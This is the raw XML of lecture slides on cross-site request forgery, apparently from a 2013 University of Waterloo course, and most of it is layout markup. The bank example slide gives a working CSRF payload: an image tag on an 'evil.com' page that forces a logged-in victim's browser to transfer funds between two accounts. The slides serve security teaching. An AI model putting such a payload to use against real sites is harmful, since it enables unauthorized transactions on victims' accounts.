                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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en-US" sz="280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68088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"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l">
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="en-US" sz="2800">
                    <a:solidFill>
                      <a:srgbClr val="40458C"/>
                    </a:solidFill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068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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en-US" sz="280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1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"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en-US" sz="280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endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2056" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"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68092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill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68093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                  <a:latin typeface="Tahom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68094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"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>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="2800">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="34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051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866987" y="433493"/>
            <a:ext cx="1105408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46" tIns="65023" rIns="130046" bIns="65023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2052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92107" y="2709333"/>
            <a:ext cx="11054080" cy="585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2637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  <p:sldLayoutId id="214748398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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="650230" algn="l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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="1300460" algn="l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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1950690" algn="l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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2600919" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="6300">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="487672" indent="-487672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4"/>
        </a:buBlip>
        <a:defRPr sz="4600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="1056623" indent="-406394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4000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1625575" indent="-325115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3400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="2275804" indent="-32511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4pPr>
      <a:lvl5pPr marL="2926034" indent="-325115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5pPr>
      <a:lvl6pPr marL="3576264" indent="-325115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6pPr>
      <a:lvl7pPr marL="4226494" indent="-325115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7pPr>
      <a:lvl8pPr marL="4876724" indent="-325115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8pPr>
      <a:lvl9pPr marL="5526954" indent="-325115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2051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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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AC8D5341-206B-2E46-AC27-134AD1D91544}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans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2053" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102184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7" r:id="rId2"/>
    <p:sldLayoutId id="2147483988" r:id="rId3"/>
    <p:sldLayoutId id="2147483989" r:id="rId4"/>
    <p:sldLayoutId id="2147483990" r:id="rId5"/>
    <p:sldLayoutId id="2147483991" r:id="rId6"/>
    <p:sldLayoutId id="2147483992" r:id="rId7"/>
    <p:sldLayoutId id="2147483993" r:id="rId8"/>
    <p:sldLayoutId id="2147483994" r:id="rId9"/>
    <p:sldLayoutId id="2147483995" r:id="rId10"/>
    <p:sldLayoutId id="2147483996" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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971800"/>
            <a:ext cx="104648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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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2051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585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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AC8D5341-206B-2E46-AC27-134AD1D91544}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans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2053" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1028940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</p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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838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827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27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1717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16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073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5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2051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2585700" y="9321800"/>
            <a:ext cx="3429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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs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+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AC8D5341-206B-2E46-AC27-134AD1D91544}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/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2053" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9334500"/>
            <a:ext cx="32766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600">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Vijay Ganesh</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104482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2" r:id="rId1"/>
    <p:sldLayoutId id="2147484023" r:id="rId2"/>
    <p:sldLayoutId id="2147484024" r:id="rId3"/>
    <p:sldLayoutId id="2147484025" r:id="rId4"/>
    <p:sldLayoutId id="2147484026" r:id="rId5"/>
    <p:sldLayoutId id="2147484027" r:id="rId6"/>
    <p:sldLayoutId id="2147484028" r:id="rId7"/>
    <p:sldLayoutId id="2147484029" r:id="rId8"/>
    <p:sldLayoutId id="2147484030" r:id="rId9"/>
    <p:sldLayoutId id="2147484031" r:id="rId10"/>
    <p:sldLayoutId id="2147484032" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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effectLst>
            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
              <a:srgbClr val="DDDDDD"/>
            </a:outerShdw>
          </a:effectLst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838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827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27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1717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16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073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5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1270000"/>
            <a:ext cx="10464800" cy="721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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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8382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2827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272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1717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162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0734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6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8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5000" indent="-571500" algn="l" rtl="0" fontAlgn="base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7366000"/>
            <a:ext cx="10464800" cy="170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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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7366000"/>
            <a:ext cx="10464800" cy="170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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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00" y="4787900"/>
            <a:ext cx="5867400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1409700"/>
            <a:ext cx="5867400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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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00" y="4787900"/>
            <a:ext cx="5867400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1409700"/>
            <a:ext cx="5867400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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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ransition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main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889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333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778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222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667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1242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81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38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95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1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9.xml"/><Relationship Id="rId2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1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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1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203200" y="1422400"/>
            <a:ext cx="12598400" cy="3721100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A408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Cross-site Request Forgery (CSRF) Attacks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19200" y="6451600"/>
            <a:ext cx="10566400" cy="21082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sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002D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Vijay Ganesh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002D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University of Waterloo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002D99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Winter 2013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C8257-F941-4A47-8C0C-4D07454A8B09}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans"/>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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-25400" y="0"/>
            <a:ext cx="13030200" cy="14208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5600" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF Attack: Bank Example*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5736" y="5020816"/>
            <a:ext cx="11953328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charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Attacker website has an image with the above </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>image forces the user’s browser a “forged request” with the specified URL, and if the customer is logged into the bank, money will be transferred from 314159265 to “1618”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The forged request is a GET request with body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>similar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to the POST request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870552" y="9053264"/>
            <a:ext cx="4608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Example courtesy https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>www.whitehatsec.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="hacke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2" y="1492424"/>
            <a:ext cx="12457384" cy="302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215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0187095" y="8886613"/>
            <a:ext cx="2709333" cy="6502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39" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3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1pPr>
            <a:lvl2pPr marL="1056569" indent="-406374">
              <a:defRPr sz="3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2pPr>
            <a:lvl3pPr marL="1625492" indent="-325098">
              <a:defRPr sz="3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3pPr>
            <a:lvl4pPr marL="2275688" indent="-325098">
              <a:defRPr sz="3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4pPr>
            <a:lvl5pPr marL="2925885" indent="-325098">
              <a:defRPr sz="3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5pPr>
            <a:lvl6pPr marL="3576081" indent="-32509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3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6pPr>
            <a:lvl7pPr marL="4226278" indent="-32509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3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7pPr>
            <a:lvl8pPr marL="4876475" indent="-32509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3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8pPr>
            <a:lvl9pPr marL="5526671" indent="-32509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3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 sz="1700">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>slide </a:t>
            </a:r>
            <a:fld id="{57416F0A-417C-B243-9C78-3C3DD64E0533}" type="slidenum">
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Arial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3004800" cy="1060376"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130942" tIns="65471" rIns="130942" bIns="65471"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>CSRF: Bank Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRP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5530303" y="2253263"/>
            <a:ext cx="1352660" cy="734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39" tIns="65020" rIns="130039" bIns="65020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>
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browser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650240" y="3467949"/>
            <a:ext cx="1192107" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRP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643388" y="2488073"/>
            <a:ext cx="1379660" cy="439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39" tIns="65020" rIns="130039" bIns="65020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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil.com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5960533" y="3467949"/>
            <a:ext cx="866987" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRP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10837333" y="3382153"/>
            <a:ext cx="1192107" cy="5396089"/>
          </a:xfrm>
          <a:prstGeom prst="rect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30039" tIns="65020" rIns="130039" bIns="65020" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0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842348" y="4118188"/>
            <a:ext cx="4118187" cy="541867"/>
            <a:chOff x="816" y="1824"/>
            <a:chExt cx="1824" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12322" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="816" y="1920"/>
              <a:ext cx="1824" cy="14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en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40995" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1056" y="1824"/>
              <a:ext cx="1242" cy="1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2000" dirty="0">
                  <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Access some web page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842348" y="4768431"/>
            <a:ext cx="4118187" cy="1508197"/>
            <a:chOff x="816" y="2112"/>
            <a:chExt cx="1824" cy="668"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12320" name="Line 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="816" y="2208"/>
              <a:ext cx="1824" cy="14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en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40993" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="912" y="2112"/>
              <a:ext cx="1584" cy="6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dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>IMG SRC=http://</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>webbank</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>transfer_funds.cgi</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>? from=314159265&amp;to=1618&amp;amount=5000&amp;date=11072006&amp;re=0&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>unt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>=5000&amp;date=11072006&amp;re=0&gt; </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="70000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>&gt;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258513" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2167468" y="6610772"/>
            <a:ext cx="3470836" cy="1218355"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21287"/>
              <a:gd name="adj2" fmla="val -88194"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1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lIns="130039" tIns="65020" rIns="130039" bIns="65020"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forces victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s browser to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>transfer.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>webbank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="B2B2B2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> without proper permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B2B2B2"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRP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6827520" y="4985170"/>
            <a:ext cx="4009813" cy="754098"/>
            <a:chOff x="3024" y="2208"/>
            <a:chExt cx="1776" cy="334"/>
          </a:xfrm>
